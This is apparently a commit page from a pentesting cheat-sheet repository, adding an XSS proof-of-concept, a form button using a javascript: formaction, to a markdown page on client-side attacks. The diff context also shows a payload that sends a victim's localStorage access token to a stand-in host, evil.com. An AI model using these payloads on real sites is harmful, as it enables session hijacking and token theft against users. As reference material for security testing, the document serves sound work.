add xss

xanhacks · Aug 14, 2024 · a66c438 · a66c438
1 parent d383e52
commit a66c438
Showing 1 changed file with 4 additions and 0 deletions.
diff --git a/content/docs/client-side/xss.md b/content/docs/client-side/xss.md
@@ -41,6 +41,10 @@ document.location='//evil.com?t='.concat(localStorage.getItem('access_token'));
 
 - HTML entity list: [Named character references](https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references)
 
+```html
+<form><button formaction="javascript:alert(document.domain)">CICK ME</button></form>
+```
+
 ### Basic filter bypass
 
 ```html